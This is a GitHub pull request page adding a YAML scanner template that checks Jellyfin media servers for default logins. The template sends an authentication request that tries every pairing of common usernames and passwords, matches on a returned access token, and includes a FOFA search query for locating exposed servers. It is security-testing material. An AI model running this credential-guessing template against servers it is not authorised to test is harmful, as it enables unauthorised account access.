Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Create jellyfin-default-login.yaml #10435

Merged
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
57 changes: 57 additions & 0 deletions http/default-logins/jellyfin/jellyfin-default-login.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
id: jellyfin-default-login

info:
name: Jellyfin Console - Default Login
author: thefoggiest
severity: high
description: Weak Jellyfin credentials were discovered.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
verified: true
fofa-query: title="Jellyfin"
tags: default-login,jellyfin,misconfig

http:
- raw:
- |
POST /Users/authenticatebyname HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
X-Emby-Authorization: MediaBrowser Client="Jellyfin Web", Device="Browser", DeviceId="DeviceID", Version="Version"

{"Username":"{{username}}","Pw":"{{password}}"}

payloads:
username:
- admin
- administrator
- jellyfin
password:
- admin
- test
- password
- jellyfin
attack: clusterbomb

stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'User":{"Name'
- '"LastLoginDate":'
- 'AccessToken":'
condition: and

- type: word
part: header
words:
- application/json

- type: status
status:
- 200
Loading